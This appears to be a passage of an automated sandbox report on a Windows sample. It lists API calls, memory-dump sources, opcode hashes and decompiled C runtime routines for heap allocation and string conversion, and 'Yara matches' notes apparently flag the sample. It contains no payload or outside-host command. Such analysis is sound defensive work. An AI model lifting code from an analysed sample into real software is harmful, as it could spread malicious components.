                • Opcode Fuzzy Hash: 85649fa39224e87f4331897b14cad9080f0bbb53d44ccd9bdfb7016801e7ab44
                • Instruction Fuzzy Hash: D81103B6D002498FDB10CF9AC844ADEFBF4AB89314F14852AD529A7710C374A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 04FBB957
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 915ba9d16b66063c533e15e6539edf4f3cd77021e7d206623dadfb7a2342447b
                • Instruction ID: 1be5a3621c848f6989544148e96982415c356b10b16f77380efea739a0969d74
                • Opcode Fuzzy Hash: 915ba9d16b66063c533e15e6539edf4f3cd77021e7d206623dadfb7a2342447b
                • Instruction Fuzzy Hash: 9A1137B58002499FDB10CFAAC844BDEBFF8EF48310F14841AE564B7210C375A954DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,009753E8,00000000,?), ref: 04FBE73D
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 9a23652e1b2c9ea7e2d4cc5511e362389e86995be855cefb9309445734e0686d
                • Instruction ID: 5cc38291c8b6170378182145831065381c537f0d5beb7fc658d1c0d4201396c2
                • Opcode Fuzzy Hash: 9a23652e1b2c9ea7e2d4cc5511e362389e86995be855cefb9309445734e0686d
                • Instruction Fuzzy Hash: 7D1128B59007499FDB10CF9AC885BEEFBF8EB59310F10841AE954A3240D378A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05256890
                Memory Dump Source
                • Source File: 00000016.00000002.340410554.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 8fa52ec0f32074002a0c515e128da008ffa198249137041481eb749c0c8ec41b
                • Instruction ID: 1d1994ea8d9750300d24b81996e1702414ae2a6c6a2a53541309b7d17db52f51
                • Opcode Fuzzy Hash: 8fa52ec0f32074002a0c515e128da008ffa198249137041481eb749c0c8ec41b
                • Instruction Fuzzy Hash: 5011F8B5C006498FCB10CF99C489BDEBBF4EF48324F158419D959A7340D778A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,009753E8,00000000,?), ref: 04FBE73D
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 7e5b48df5df4a47ba29fd46885c3a29d044ed2e4a4dcc4d8c2d459ff99300c0e
                • Instruction ID: ad0c54c081d5968d11674a84814a8b3c6c14f31102a469eaf0c71beed1714d17
                • Opcode Fuzzy Hash: 7e5b48df5df4a47ba29fd46885c3a29d044ed2e4a4dcc4d8c2d459ff99300c0e
                • Instruction Fuzzy Hash: 2B1125B5900749CFDB10CF99C4847EEBBF4EB19314F24841AD968A3640D378AA56CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05256890
                Memory Dump Source
                • Source File: 00000016.00000002.340410554.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 735938bc1dad1575a305ddd3bf7add3efc9989e5ce397404cc08ebc25916caf1
                • Instruction ID: d9d5ce0bba002ef3809e05430d90906945bd4fe931478ec9acf93639cd6600e1
                • Opcode Fuzzy Hash: 735938bc1dad1575a305ddd3bf7add3efc9989e5ce397404cc08ebc25916caf1
                • Instruction Fuzzy Hash: F61106B58006498FCB10CF99C448BDEBBF4EF48324F10842AD969A7340D778A545CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 009E962E
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 1cc393120fcff6c5324d2822960226875fe9997aaa72c4c7a240c3b54ea9fb7e
                • Instruction ID: 9298bde7a5c44b6e125447e28e10510e6fea7347b64e630e12836fdba538e98b
                • Opcode Fuzzy Hash: 1cc393120fcff6c5324d2822960226875fe9997aaa72c4c7a240c3b54ea9fb7e
                • Instruction Fuzzy Hash: 0411D2B5D006898FCB10CF9AC444BDEFBF4AB88714F10851AD429A7600C375A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 04FBBCBD
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 7c894487b47da83c679639ea2d8b66861496710c8e8ca1f2d094ea0a89ea8b26
                • Instruction ID: ce375d23594c5613b381d1d62da994e80c5d1b0f4c5e4881e6182f58d7f7dec3
                • Opcode Fuzzy Hash: 7c894487b47da83c679639ea2d8b66861496710c8e8ca1f2d094ea0a89ea8b26
                • Instruction Fuzzy Hash: 9311F2B5900748DFDB11CF9AC888BDEBBF8EB49310F10841AE969A7700C375A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,04FB226A,?,00000000,?), ref: 04FBC435
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 57e72ca8923bf29218fe480b4f395a10c19ad403d26b91ffb86dee870148f8e7
                • Instruction ID: fb9d4408ec5cf8a261a126bb08638fe4051988833bcf63464d491f1931a81cb1
                • Opcode Fuzzy Hash: 57e72ca8923bf29218fe480b4f395a10c19ad403d26b91ffb86dee870148f8e7
                • Instruction Fuzzy Hash: 7F11E3B59007889FDB10CF9AC884BEFBBF8EB49314F108419E558A7600C374A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 04FBD29D
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 288c026d15a82567156d6fb5a9a72c1778bb322445dc1beb48c4ca0d5ed1c0aa
                • Instruction ID: 9e6a78b91c0ea3ea5893851b7ebc3a4c9861c45105315b19ea9dedc96dee53cf
                • Opcode Fuzzy Hash: 288c026d15a82567156d6fb5a9a72c1778bb322445dc1beb48c4ca0d5ed1c0aa
                • Instruction Fuzzy Hash: EB11F5B59006489FDB10CF9AC484BDEBBF8EB49314F108419E958B7200C375A945CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000016.00000002.340410554.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 3a240eda2bab4f0a65e176f396df1d7cc37bee054b7e1b3dd40d8a15b4a154f6
                • Instruction ID: f2c4130700e62580c1a7865713b9c0243310a2e901018e7ed4f49c0ba6343f67
                • Opcode Fuzzy Hash: 3a240eda2bab4f0a65e176f396df1d7cc37bee054b7e1b3dd40d8a15b4a154f6
                • Instruction Fuzzy Hash: 4311F5B5C046499FCB10CF9AE4487DEFBF4EB48314F10851AD819A3600C3786545CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 009EFE9D
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 360cce1c9d24d33f0f8f992794d6326b5226cd3c831174414c437e4205f5351b
                • Instruction ID: 3f43c8ef73cd86554abbc2ef96c8bde75ad93a9f2a02a7e98165074683446380
                • Opcode Fuzzy Hash: 360cce1c9d24d33f0f8f992794d6326b5226cd3c831174414c437e4205f5351b
                • Instruction Fuzzy Hash: 681133B59003898FDB11CF99D4847DEFBF4EB48314F20841AD959A7240C374AA45CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowLongW.USER32(?,?,?), ref: 009EFE9D
                Memory Dump Source
                • Source File: 00000016.00000002.338873317.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                Similarity
                • API ID: LongWindow
                • String ID:
                • API String ID: 1378638983-0
                • Opcode ID: 35e916bc14a7bfc4f72d96e1fe21434ddae60c49f158cb0f0c6452aa44d933f1
                • Instruction ID: 34ecc966778e2888da94800f2fd263e77b9e46f285e069501fa3e574a787e135
                • Opcode Fuzzy Hash: 35e916bc14a7bfc4f72d96e1fe21434ddae60c49f158cb0f0c6452aa44d933f1
                • Instruction Fuzzy Hash: 3211E5B59002499FDB10CF9AD585BDEFBF8EB48324F10855AE919B7340C374A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 04FBD29D
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: ed3262676f3f35a59a602ac25781c6ec13bf25f4fba4d8201d40881916b758bc
                • Instruction ID: 103b8acdf93a7a4d5de68f8348960399cadad71ccb95d5c400ae14d0b19319ce
                • Opcode Fuzzy Hash: ed3262676f3f35a59a602ac25781c6ec13bf25f4fba4d8201d40881916b758bc
                • Instruction Fuzzy Hash: A11103B9D00789CFDB11CF99D584BDEBBF4EB48314F10841AD958A7640C378A655CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000016.00000002.340410554.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: 7afcaed5856fbe5d9ccd9391ed2c9ceefdc45be863cfb339303e189c68c20484
                • Instruction ID: 9eba245e34003afdd82a7e03df8a3d0237ebff6ce9601a6455251dddbe32ad0f
                • Opcode Fuzzy Hash: 7afcaed5856fbe5d9ccd9391ed2c9ceefdc45be863cfb339303e189c68c20484
                • Instruction Fuzzy Hash: D711CEB5D046498FCB10CF9AD848BDEFBF4EB48324F10852AE829A7240D378A545CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,04FB226A,?,00000000,?), ref: 04FBC435
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 689d07e77e2580ce21029f06350863d8b6af450be07b3bd5ceb38ac81d680a88
                • Instruction ID: be6bd4214482bd8a7b9221b29dffea92824e3b86848cff2edb97807cb6e2bf65
                • Opcode Fuzzy Hash: 689d07e77e2580ce21029f06350863d8b6af450be07b3bd5ceb38ac81d680a88
                • Instruction Fuzzy Hash: 7B11D3B9900789CFDB10CF99D584BDEBBF4EB48314F10841AD958A7644C375AA45CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 04FBBCBD
                Memory Dump Source
                • Source File: 00000016.00000002.339939060.0000000004FB0000.00000040.00000001.sdmp, Offset: 04FB0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 935755b73fba4e68629433ed8c5f42e66491ffe9a7cfc6bc950a013710e02b90
                • Instruction ID: a3195dd65f43b2c936d8492592c6bb12fc4f90050563bfeefec5a03496b10053
                • Opcode Fuzzy Hash: 935755b73fba4e68629433ed8c5f42e66491ffe9a7cfc6bc950a013710e02b90
                • Instruction Fuzzy Hash: A11100B99007898FDB11CF99D584BDEBBF4EB48324F10841AD968A7640C378AA44CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00403E3D(void* __ecx, long _a4) {
                				void* _t4;
                				void* _t6;
                				void* _t7;
                				long _t8;
                
                				_t7 = __ecx;
                				_t8 = _a4;
                				if(_t8 > 0xffffffe0) {
                					L7:
                					 *((intOrPtr*)(E00404831())) = 0xc;
                					__eflags = 0;
                					return 0;
                				}
                				if(_t8 == 0) {
                					_t8 = _t8 + 1;
                				}
                				while(1) {
                					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                					if(_t4 != 0) {
                						break;
                					}
                					__eflags = E00403829();
                					if(__eflags == 0) {
                						goto L7;
                					}
                					_t6 = E004068FD(_t7, __eflags, _t8);
                					_pop(_t7);
                					__eflags = _t6;
                					if(_t6 == 0) {
                						goto L7;
                					}
                				}
                				return _t4;
                			}
                0x00403e3d
                0x00403e43
                0x00403e49
                0x00403e7b
                0x00403e80
                0x00403e86
                0x00000000
                0x00403e86
                0x00403e4d
                0x00403e4f
                0x00403e4f
                0x00403e66
                0x00403e6f
                0x00403e77
                0x00000000
                0x00000000
                0x00403e57
                0x00403e59
                0x00000000
                0x00000000
                0x00403e5c
                0x00403e61
                0x00403e62
                0x00403e64
                0x00000000
                0x00000000
                0x00403e64
                0x00000000

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000016.00000002.338714364.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9646417c9a99040a4442b3cdd6d1f3616efc67582fe79249c8066271582e8d5b
                • Instruction ID: 68335197825c32d6f1436b17872489cd9444c7c8c78fd530697fe24db11eba40
                • Opcode Fuzzy Hash: 9646417c9a99040a4442b3cdd6d1f3616efc67582fe79249c8066271582e8d5b
                • Instruction Fuzzy Hash: D92125B1508244DFCB00DF90D8C0B2ABF65FB88314F34C569E9094B28AC33BD855DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000016.00000002.338739183.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e0ba0f58568404ebc87ac362c6e74a2976a2752071876c2eee1edcdb61197bf6
                • Instruction ID: ddb66649c2ab0742eb5ac81e70ab8de026067874bd47e27793d8987a42718d01
                • Opcode Fuzzy Hash: e0ba0f58568404ebc87ac362c6e74a2976a2752071876c2eee1edcdb61197bf6
                • Instruction Fuzzy Hash: 0C210770608248EFDB05CF14D9C0B6ABBA5FB84314F34CE6DE9194B246C33AD886CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000016.00000002.338739183.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 01236ccfbede99e81ed4a417b92903d0e13e000d84bf30be0656e406cae8ff6f
                • Instruction ID: 7d7f6abbcb90c05ba61d59e2479f9db28c345771d7cf0f490da37e081989b541
                • Opcode Fuzzy Hash: 01236ccfbede99e81ed4a417b92903d0e13e000d84bf30be0656e406cae8ff6f
                • Instruction Fuzzy Hash: C021F575708248EFDB14CF14D9C0B66BB65FB88314F24C96DE9094B246C33AD886CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000016.00000002.338739183.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fe24dbf1efa328d3092d3f6562f84d8af302bab3faa840ed65370cad98792e77
                • Instruction ID: f61169f57fb57cbf750b3c51c1c82c7c3c812d53bf0be7eb2e9b8ddd9082eca1
                • Opcode Fuzzy Hash: fe24dbf1efa328d3092d3f6562f84d8af302bab3faa840ed65370cad98792e77
                • Instruction Fuzzy Hash: FA2180755093C49FDB02CF24D990755BF71EB46314F28C5EAD8498B2A7C33AD84ACB62
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000016.00000002.338714364.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction ID: e0b72f85c72940069c6f4a4261eaa5d77404640d0e6bf79094b66059a1d94534
                • Opcode Fuzzy Hash: 520a709b2b53abc1a84ade3d88b0939ca7d6b7fe0f5f46f482eef57b391292f4
                • Instruction Fuzzy Hash: 5111D376504280DFCF11CF50D9C4B16BF71FB84324F24C6A9D8094B256C336D85ACBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000016.00000002.338739183.000000000091D000.00000040.00000001.sdmp, Offset: 0091D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction ID: 333340e58d9cb5a0c9fc3558b25e5d4b650c65a70252cf6d9e39ba4c12ddbac6
                • Opcode Fuzzy Hash: 782f9e41915746642c1b3bc8a08954d687731868874878b396c9b934aeaa4875
                • Instruction Fuzzy Hash: 0811DD75A04284DFDB01CF10D5C0B55FBA1FB84314F24CAAED8594B656C33AD84ACB61
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000016.00000002.338714364.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 121bf21f8404b0b8d2e0f2cb015ca1242a1c6c9dd7331eeba81ad90e09c6af2d
                • Instruction ID: 8dc1efd877cfaee2e999e278c2a73237950bfed59d7db8bdff2ca505c6bfb79d
                • Opcode Fuzzy Hash: 121bf21f8404b0b8d2e0f2cb015ca1242a1c6c9dd7331eeba81ad90e09c6af2d
                • Instruction Fuzzy Hash: 8801F77140A3849EE7104A61CC8476ABBACEF41324F18C41AED4C5B2C6C379D945C7B1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000016.00000002.338714364.000000000090D000.00000040.00000001.sdmp, Offset: 0090D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ecf2b106e6c274ac84ea0983990ea5f09f92e0b25c59d785aa762207e7759c38
                • Instruction ID: caebd33e918d33da57e24481594d1dbd3fda7cfe0828c8570cceb2f5f1997cee
                • Opcode Fuzzy Hash: ecf2b106e6c274ac84ea0983990ea5f09f92e0b25c59d785aa762207e7759c38
                • Instruction Fuzzy Hash: CEF0C271405284AEE7108E16CC84B66FBACEB41324F18C05AED480B286C3799C44CAB0
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 70%
                			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                				signed int _v8;
                				int _v12;
                				void* _v24;
                				signed int _t49;
                				signed int _t54;
                				int _t56;
                				signed int _t58;
                				short* _t60;
                				signed int _t64;
                				short* _t68;
                				int _t76;
                				short* _t79;
                				signed int _t85;
                				signed int _t88;
                				void* _t93;
                				void* _t94;
                				int _t96;
                				short* _t99;
                				int _t101;
                				int _t103;
                				signed int _t104;
                				short* _t105;
                				void* _t108;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t49 =  *0x412014; // 0xf1d94be9
                				_v8 = _t49 ^ _t104;
                				_t101 = _a20;
                				if(_t101 > 0) {
                					_t76 = E004080DB(_a16, _t101);
                					_t108 = _t76 - _t101;
                					_t4 = _t76 + 1; // 0x1
                					_t101 = _t4;
                					if(_t108 >= 0) {
                						_t101 = _t76;
                					}
                				}
                				_t96 = _a32;
                				if(_t96 == 0) {
                					_t96 =  *( *_a4 + 8);
                					_a32 = _t96;
                				}
                				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                				_v12 = _t54;
                				if(_t54 == 0) {
                					L38:
                					E004018CC();
                					return _t54;
                				} else {
                					_t93 = _t54 + _t54;
                					_t83 = _t93 + 8;
                					asm("sbb eax, eax");
                					if((_t93 + 0x00000008 & _t54) == 0) {
                						_t79 = 0;
                						__eflags = 0;
                						L14:
                						if(_t79 == 0) {
                							L36:
                							_t103 = 0;
                							L37:
                							E004063D5(_t79);
                							_t54 = _t103;
                							goto L38;
                						}
                						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                						_t119 = _t56;
                						if(_t56 == 0) {
                							goto L36;
                						}
                						_t98 = _v12;
                						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                						_t103 = _t58;
                						if(_t103 == 0) {
                							goto L36;
                						}
                						if((_a12 & 0x00000400) == 0) {
                							_t94 = _t103 + _t103;
                							_t85 = _t94 + 8;
                							__eflags = _t94 - _t85;
                							asm("sbb eax, eax");
                							__eflags = _t85 & _t58;
                							if((_t85 & _t58) == 0) {
                								_t99 = 0;
                								__eflags = 0;
                								L30:
                								__eflags = _t99;
                								if(__eflags == 0) {
                									L35:
                									E004063D5(_t99);
                									goto L36;
                								}
                								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                								__eflags = _t60;
                								if(_t60 == 0) {
                									goto L35;
                								}
                								_push(0);
                								_push(0);
                								__eflags = _a28;
                								if(_a28 != 0) {
                									_push(_a28);
                									_push(_a24);
                								} else {
                									_push(0);
                									_push(0);
                								}
                								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                								__eflags = _t103;
                								if(_t103 != 0) {
                									E004063D5(_t99);
                									goto L37;
                								} else {
                									goto L35;
                								}
                							}
                							_t88 = _t94 + 8;
                							__eflags = _t94 - _t88;
                							asm("sbb eax, eax");
                							_t64 = _t58 & _t88;
                							_t85 = _t94 + 8;
                							__eflags = _t64 - 0x400;
                							if(_t64 > 0x400) {
                								__eflags = _t94 - _t85;
                								asm("sbb eax, eax");
                								_t99 = E00403E3D(_t85, _t64 & _t85);
                								_pop(_t85);
                								__eflags = _t99;
                								if(_t99 == 0) {
                									goto L35;
                								}
                								 *_t99 = 0xdddd;
                								L28:
                								_t99 =  &(_t99[4]);
                								goto L30;
                							}
                							__eflags = _t94 - _t85;
                							asm("sbb eax, eax");
                							E004018E0();
                							_t99 = _t105;
                							__eflags = _t99;
                							if(_t99 == 0) {
                								goto L35;
                							}
                							 *_t99 = 0xcccc;
                							goto L28;
                						}
                						_t68 = _a28;
                						if(_t68 == 0) {
                							goto L37;
                						}
                						_t123 = _t103 - _t68;
                						if(_t103 > _t68) {
                							goto L36;
                						}
                						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                						if(_t103 != 0) {
                							goto L37;
                						}
                						goto L36;
                					}
                					asm("sbb eax, eax");
                					_t70 = _t54 & _t93 + 0x00000008;
                					_t83 = _t93 + 8;
                					if((_t54 & _t93 + 0x00000008) > 0x400) {
                						__eflags = _t93 - _t83;
                						asm("sbb eax, eax");
                						_t79 = E00403E3D(_t83, _t70 & _t83);
                						_pop(_t83);
                						__eflags = _t79;
                						if(__eflags == 0) {
                							goto L36;
                						}
                						 *_t79 = 0xdddd;
                						L12:
                						_t79 =  &(_t79[4]);
                						goto L14;
                					}
                					asm("sbb eax, eax");
                					E004018E0();
                					_t79 = _t105;
                					if(_t79 == 0) {
                						goto L36;
                					}
                					 *_t79 = 0xcccc;
                					goto L12;
                				}
                			}
                0x004078d4
                0x004078d5
                0x004078d6
                0x004078dd
                0x004078e2
                0x004078e8
                0x004078ee
                0x004078f4
                0x004078f7
                0x004078f7
                0x004078fa
                0x004078fc
                0x004078fc
                0x004078fa
                0x004078fe
                0x00407903
                0x0040790a
                0x0040790d
                0x0040790d
                0x00407929
                0x0040792f
                0x00407934
                0x00407ac7
                0x00407ad2
                0x00407ada
                0x0040793a
                0x0040793a
                0x0040793d
                0x00407942
                0x00407946
                0x0040799a
                0x0040799a
                0x0040799c
                0x0040799e
                0x00407abc
                0x00407abc
                0x00407abe
                0x00407abf
                0x00407ac5
                0x00000000
                0x00407ac5
                0x004079af
                0x004079b5
                0x004079b7
                0x00000000
                0x00000000
                0x004079bd
                0x004079cf
                0x004079d4
                0x004079d8
                0x00000000
                0x00000000
                0x004079e5
                0x00407a1f
                0x00407a22
                0x00407a25
                0x00407a27
                0x00407a29
                0x00407a2b
                0x00407a77
                0x00407a77
                0x00407a79
                0x00407a79
                0x00407a7b
                0x00407ab5
                0x00407ab6
                0x00000000
                0x00407abb
                0x00407a8f
                0x00407a94
                0x00407a96
                0x00000000
                0x00000000
                0x00407a9a
                0x00407a9b
                0x00407a9c
                0x00407a9f
                0x00407adb
                0x00407ade
                0x00407aa1
                0x00407aa1
                0x00407aa2
                0x00407aa2
                0x00407aaf
                0x00407ab1
                0x00407ab3
                0x00407ae4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407ab3
                0x00407a2d
                0x00407a30
                0x00407a32
                0x00407a34
                0x00407a36
                0x00407a39
                0x00407a3e
                0x00407a59
                0x00407a5b
                0x00407a65
                0x00407a67
                0x00407a68
                0x00407a6a
                0x00000000
                0x00000000
                0x00407a6c
                0x00407a72
                0x00407a72
                0x00000000
                0x00407a72
                0x00407a40
                0x00407a42
                0x00407a46
                0x00407a4b
                0x00407a4d
                0x00407a4f
                0x00000000
                0x00000000
                0x00407a51
                0x00000000
                0x00407a51
                0x004079e7
                0x004079ec
                0x00000000
                0x00000000
                0x004079f2
                0x004079f4
                0x00000000
                0x00000000
                0x00407a10
                0x00407a14
                0x00000000
                0x00000000
                0x00000000
                0x00407a1a
                0x0040794d
                0x0040794f
                0x00407951
                0x00407959
                0x00407978
                0x0040797a
                0x00407984
                0x00407986
                0x00407987
                0x00407989
                0x00000000
                0x00000000
                0x0040798f
                0x00407995
                0x00407995
                0x00000000
                0x00407995
                0x0040795d
                0x00407961
                0x00407966
                0x0040796a
                0x00000000
                0x00000000
                0x00407970
                0x00000000
                0x00407970

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
